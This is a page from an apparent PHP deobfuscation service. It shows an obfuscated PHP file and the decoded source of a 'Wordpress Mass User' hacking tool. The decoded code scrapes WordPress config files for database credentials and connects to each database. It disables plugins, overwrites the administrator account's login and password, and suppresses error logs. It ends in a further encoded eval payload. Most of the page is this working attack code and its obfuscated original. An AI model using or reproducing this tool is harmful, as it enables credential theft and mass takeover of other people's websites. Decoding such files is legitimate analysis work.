Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $str = "=cenHBswisx5fQv/85tvc8Tyz+X6H5cz/vfX6N3mlQeKOOo7/PSO6A3scq9E2TiCJyavLKkJNrb..

Decoded Output download

b'<?php


echo \' <html><head><title>Wordpress Mass User</title><style type="text/css">
body {
background-color:#000000;
background-image:url("https://i.imgur.com/hLcQCBx.gif");
background-repeat:repeat;
margin-top:20px;
font-family:"Agency FB";
font-size:12pt; color:#ffffff;
	}
	input,textarea,select{
	font-weight: bold;
	color: #cccccc;
	dashed #ffffff;
	border: 1px
	solid #2C2C2C;
	background-color: #080808
	}
	a {
		background-color: #151515;
		vertical-align: bottom;
		color: #d0c8c8;
		text-decoration: none;
		font-size: 20px;
		margin: 8px;
		padding: 6px;
		border: thin solid #000000;
	}
	a:hover {
		background-color: #080808;
		vertical-align: bottom;
		color: #333;
		text-decoration: none;
		font-size: 20px;
		margin: 8px;
		padding: 6px;
		border: #d53b3b;
	}
	.style1 {
		text-align: center;
		color: #d9910e;
	}
	.style2 {
		color: #d9910e;
		font-weight: bold;
		
			}
	.style3 {
		color: #d9910e;
			}
	textarea{
	background:transparent;
	border: 1px solid #2d2b2b;
	width: 80%;
	height: 400px;
	padding-left: 5px;
	margin: 10px auto;
	font-family:Homenaje;
	color: #ffffff;
	font-size:13px;
	}
	</style></head> \';

@ini_set(\'error_log\',NULL);
@ini_set(\'log_errors\',0);
@ini_set(\'max_execution_time\',0);
@ini_set(\'output_buffering\',0);
@ini_set(\'display_errors\', 0);
$pass =  md5($Password);
function GrabUrl($url,$type){

        $urlArray = array();

        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $result = curl_exec($ch);

        $regex=\'|<a.*?href="(.*?)"|\';
        preg_match_all($regex,$result,$parts);
        $links=$parts[1];
        foreach($links as $link){
            array_push($urlArray, $link);
        }
        curl_close($ch);

        foreach($urlArray as $value){
            $lol="$url$value";
			if(preg_match("#$type#is", $lol)) {
				echo "$lol
";
			}
        }
}
function HEx($param, $kata1, $kata2){
    if(strpos($param, $kata1) === FALSE) return FALSE;
    if(strpos($param, $kata2) === FALSE) return FALSE;
    $start = strpos($param, $kata1) + strlen($kata1);
    $end = strpos($param, $kata2, $start);
    $return = substr($param, $start, $end - $start);
    return $return;
}
echo "<center>
<font color=\'white\' size=\'40\'>Wordpress Mass User</font>

<table width=\'100%\' cellspacing=\'0\' cellpadding=\'0\' class=\'tb1\' >
<td height=\'10\' align=\'left\' class=\'td1\'></td></tr><tr><td
width=\'100%\' align=\'center\' valign=\'top\' rowspan=\'1\'><font
color=\'red\' face=\'comic sans ms\'size=\'1\'><b>
<font color=#ff9933>
</font><br><font color=white>--==[[Greetz to]]==--</font><br><font  color=#ff9933>-=| HEx |=-<br>
</table>
</table> <div align=center><font color=#ff9933 font size=5><marquee behavior=\'scroll\' direction=\'left\' scrollamount=\'2\' scrolldelay=\'5\' width=\'70%\'><p>
<span  class=\'footerlink\'> ####### Coded By HEx #######</span>
</marquee><br><br></font></div>
<form method=\'post\'>
Link Config: <br>
<input type=\'text\' name=\'linkconf\' height=\'10\' size=\'50\' placeholder=\'http://url.com/priv8_sym404/\'><br><br>
<input type=\'submit\' style=\'width: 150px;\' name=\'gass\' value=\'Submit!!\'>
</form></center>";
if($_POST[\'gass\']) {
	echo "<center>
<form method=\'post\'>
Link Config: <br>
<textarea name=\'link\'>";
GrabUrl($_POST[\'linkconf\'],\'wordpress\');	
echo"</textarea><br><br>
<input type=\'submit\' style=\'width: 200px;\' name=\'edittitle\' value=\'Submit!!\'>
</form></center>";
}
if($_POST[\'edittitle\']) {
	        $title = htmlspecialchars($_POST[\'title\']);
                $id = $_POST[\'id\'];
                $content = $_POST[\'content\'];
                $postname = $_POST[\'name\'];
		function anucurl($sites) {
    		$ch = curl_init($sites);
	       		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	       		  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	       		  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
	       		  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
	       		  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
	       		  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
	       		  curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');
	       		  curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');
	       		  curl_setopt($ch, CURLOPT_COOKIESESSION,true);
			$data = curl_exec($ch);
				  curl_close($ch);
			return $data;
		}
		$link = explode("
", $_POST[\'link\']);
		foreach($link as $dir_config) {
                                $config = anucurl($dir_config);
				preg_match("/define.*DB_NAME.*\"(.*)\"/", $config, $m);
				$dbname1 = $m[1];
				preg_match(\'/define.*DB_NAME.*\'(.*)\'/\', $config, $m);
				$dbname2 = $m[1];
				$dbname = ("$dbname1$dbname2");
				
				preg_match("/define.*DB_USER.*\"(.*)\"/", $config, $m);
				$dbuser1 = $m[1];
				preg_match(\'/define.*DB_USER.*\'(.*)\'/\', $config, $m);
				$dbuser2 = $m[1];
				$dbuser = ("$dbuser1$dbuser2");
				
				preg_match("/define.*DB_PASSWORD.*\"(.*)\"/", $config, $m);
				$dbpass1 = $m[1];
				preg_match(\'/define.*DB_PASSWORD.*\'(.*)\'/\', $config, $m);
				$dbpass2 = $m[1];
				$dbpass = ("$dbpass1$dbpass2");

				preg_match("/define.*DB_HOST.*\"(.*)\"/", $config, $m);
				$dbhost1 = $m[1];
				preg_match(\'/define.*DB_HOST.*\'(.*)\'/\', $config, $m);
				$dbhost2 = $m[1];
				$dbhost = ("$dbhost1$dbhost2");
				
				preg_match("/\\$table_prefix.+?\"(.+?)\".+/", $config, $m);
				$dbprefix0 = $m[1];
				$dbprefix1 = HEx($config,"table_prefix  = \'","\'");
				$dbprefix2 = HEx($config,"table_prefix = \'","\'");
				$dbprefix3 = HEx($config,"table_prefix= \'","\'");
				$dbprefix4 = HEx($config,"table_prefix   = \'","\'");
				$dbprefix = ("$dbprefix0$dbprefix1$dbprefix2$dbprefix3$dbprefix4");
				$connect = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname);
				if ($connect) {
					$query1 = mysqli_query($connect, "select * from " . $dbprefix . "options where option_name=\'siteurl\'");
					while ($siteurl = mysqli_fetch_array($query1)) {
						$site_url = $siteurl[\'option_value\'];
					}
					$query3 = mysqli_query($connect, "update " . $dbprefix . "options set option_name=\'active_plugins1\' where option_name=\'active_plugins\'");
					$query2 = mysqli_query($connect, "update " . $dbprefix . "users set user_login=\'$Username\',user_pass=\'$pass\' where id=\'1\'");
					if ($query2) {
						echo "<center><span class=f>URL : <a href=\'$site_url/wp-login.php\' target=\'_blank\'>$site_url/wp-login.php</a><br><br>UserName : <font color=\'#ff9933\'>$Username</font><br><br>Password : <font color=\'#ff9933\'>$Password</font><br><br></span></center>";
					}
				}
			}
		}
$encode = "lUd/eNs6FP27hX6HO25jAl6ctNsYyw8a5znJG4+84Gdd3S4Yy8hlm0GxlUvEHv3u78pB88hT6QbGlmjOPUpU91eXKkdOLGzDlIxEFhRneE0wnPp+s3tpbWxAZD6oGDHC7XAsRmRHiMef8FoSplzRELaSBykNuQxs3DASSTR/nJ0CGHYOfVXxP0Al3iAaIjoS6kzUphFiIM+C+dT1ndEkY73J1B1B3NljvPBcCzqv8BeO7zuffXQ+m1w7w9f507Hnzq684cQCZVi/q6IQ9vtJu/FMhRl9iG44gQ+tQRfY/aeL80m7CUoy3UT7vN1249OBhW9lUEq2Bl/zMh77wd+ee734dOR2L+3f5n9kxpPX+WbHubn2vs5cy7jynX90/vjOWelBmcvfClxc+94LkQaTZEXw5/LJlVm1Tw0yyRMWPmZj6uns1BAdJB81gplmHsWfeTsSMZd4FbZFTdpZPNjvYj9ced+9K1qtdKz/IGX+vZ35N/5SHZm+HInk1knxPEwnsXF7vJLJ5L0qMqbCnXFpKUeBL8xFj1t8xXjtXK60OomTVbKYC9b++PH8ZVuRQ8Y6ns8pPyC4FRaasmNspPIn4k/tQ8sIsPewvmpz/Q2Gs1vPXE8XkLXKOi1ZVKD1Iq8FQOCYMPoywrG/qENvfHDfT51Gr6VETLBgnx8HmE9bOztIm4aK9cE2gitiZVQK8UOsyLLZhJMfADLNKZi9nJfFoLem2eOgt6GshEXynHP9EbYmVTz5j5HskxI7QFKCZFtm3nOCCwKiuhb6hAxtKowSDjVqowpWIBQljuuUVGucrFjF4V4UCRKmEaKVKH7qSNjVksyuRAXjhl4age7h8cFOFwDUBho1447oXHEJYvpgmlpAYsYmKYpV8Lwqh+v9NfXGuAFthugtPA7s1nclvZdOEhVHcTILtIvnBCYvo0BmzaX1v2mzVwX7nSS9vDPoCcjx3uibB5I5Y2HezguV7iCXWb7p2U877AxVF56e4AnqT8GhRc+LNdPS1KXCK/ZxnyBvZaDLfm+kJRr7hayh+BGbvMRQXEm/+1X7EJopqULyfw==";
eval(str_rot13(gzinflate(str_rot13(base64_decode(($encode))))));
echo \'</html>\';
?>
'

Did this file decode correctly?

Original Code

<?php
$str = "=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";
eval("".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($str))))))));
exit; ?>

Function Calls

strrev 1
gzinflate 3
gzuncompress 2
base64_decode 1

Variables

$str =cenHBswisx5fQv/85tvc8Tyz+X6H5cz/vfX6N3mlQeKOOo7/PSO6A3scq9E..

Stats

MD5 d960b03cc56b5e693a8223d3ad02e2ca
Eval Count 1
Decode Time 93 ms